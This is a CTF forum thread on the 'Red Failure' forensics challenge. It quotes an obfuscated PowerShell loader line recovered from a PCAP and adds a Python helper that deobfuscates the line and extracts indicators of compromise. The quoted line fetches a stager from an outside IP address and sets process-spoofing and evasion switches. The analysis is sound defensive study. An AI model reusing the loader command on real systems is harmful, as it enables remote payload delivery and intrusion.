Red Failure Discussion [FORENSICS]

Let’s discuss Red Failure. Please do not share any flags or writeups.

Exported HTTP objects from the PCAP file.

Inspected the PS script:

PS C:\> ${c`MD}
currentthread /sc:http://147.182.172.189:80/9tVI0 /password:z64&Rx27Z$B%73up /image:C:\Windows\System32\svchost.exe /pid:notepad /ppid:explorer /dll:msvcp_win.dll /blockDlls:True /am51:True
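For anyone working through the same script: the `${c`MD}` on the first line is PowerShell backtick obfuscation (inside a `${...}` variable name a backtick before an ordinary letter is a no-op escape, so it is just `$cMD`), and the second line is a `verb /key:value ...` argument string whose fields are the IOCs worth pulling out (stager URL and port, the password, the spoofed image, the target and parent process names, and the boolean switches). The following triage helpers are an added example written for this thread, not code from the challenge or from any tool; the set of escape sequences treated as meaningful and the field names in the IOC dictionary are my own assumptions. The two input lines are copied from the post above.

```python
"""Triage helpers for the obfuscated PowerShell loader line posted above.

Added example for this thread; not part of the challenge files.
"""
import re
from urllib.parse import urlparse

# Copied from the post above (not constructed).
OBFUSCATED_VARIABLE = "${c`MD}"
LOADER_LINE = (
    "currentthread /sc:http://147.182.172.189:80/9tVI0 "
    "/password:z64&Rx27Z$B%73up /image:C:\\Windows\\System32\\svchost.exe "
    "/pid:notepad /ppid:explorer /dll:msvcp_win.dll /blockDlls:True /am51:True"
)

# Backtick escapes that DO change meaning in PowerShell and must be kept
# (assumption: anything else is a no-op escape inserted only to break
# string matching and can be dropped).
_PS_MEANINGFUL_ESCAPES = set("0abefnrtuv`\"'$")


def strip_noop_backticks(text: str) -> str:
    """Remove backticks that merely escape an ordinary character."""
    out = []
    i = 0
    while i < len(text):
        ch = text[i]
        if ch == "`" and i + 1 < len(text) and text[i + 1] not in _PS_MEANINGFUL_ESCAPES:
            i += 1  # drop the backtick, keep the character it "escaped"
            continue
        out.append(ch)
        i += 1
    return "".join(out)


def normalize_variable(token: str) -> str:
    """${c`MD} -> $cMD ; tokens that are not a braced variable are returned as-is."""
    token = strip_noop_backticks(token)
    m = re.fullmatch(r"\$\{([A-Za-z_][A-Za-z0-9_]*)\}", token)
    return f"${m.group(1)}" if m else token


def parse_loader_args(line: str):
    """Split 'verb /key:value /key:value ...' into (verb, {key: value}).

    Only the first ':' in each token separates key from value, so a URL with
    a port and a password containing '&', '$' or '%' survive intact.
    """
    parts = line.split()
    verb, opts = parts[0], {}
    for part in parts[1:]:
        if not part.startswith("/") or ":" not in part:
            raise ValueError(f"unexpected token in loader line: {part!r}")
        key, _, value = part[1:].partition(":")
        opts[key] = value
    return verb, opts


def extract_iocs(opts: dict) -> dict:
    """Pull the indicators a responder would block or hunt for.

    Field names are an assumption of this example, not the loader's own terms.
    """
    url = urlparse(opts["sc"])
    return {
        "stager_url": opts["sc"],
        "c2_host": url.hostname,
        "c2_port": url.port or (443 if url.scheme == "https" else 80),
        "stager_password": opts.get("password"),
        "spoofed_image": opts.get("image"),
        "target_process": opts.get("pid"),
        "spoofed_parent": opts.get("ppid"),
        "named_dll": opts.get("dll"),
        # Switches set to True; which evasions they enable is up to the reader.
        "boolean_switches": sorted(k for k, v in opts.items() if v.lower() == "true"),
    }


def triage(var_token: str = OBFUSCATED_VARIABLE, line: str = LOADER_LINE) -> dict:
    verb, opts = parse_loader_args(line)
    result = extract_iocs(opts)
    result["variable"] = normalize_variable(var_token)
    result["verb"] = verb
    return result


if __name__ == "__main__":
    for k, v in triage().items():
        print(f"{k:>18}: {v}")
```

The parsing deliberately keeps values verbatim instead of splitting on special characters, because the password field is exactly the kind of value that naive tokenizers mangle; check the `stager_password` output against the raw line before putting it in a report.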

That’s it with RE Corner - scdbg download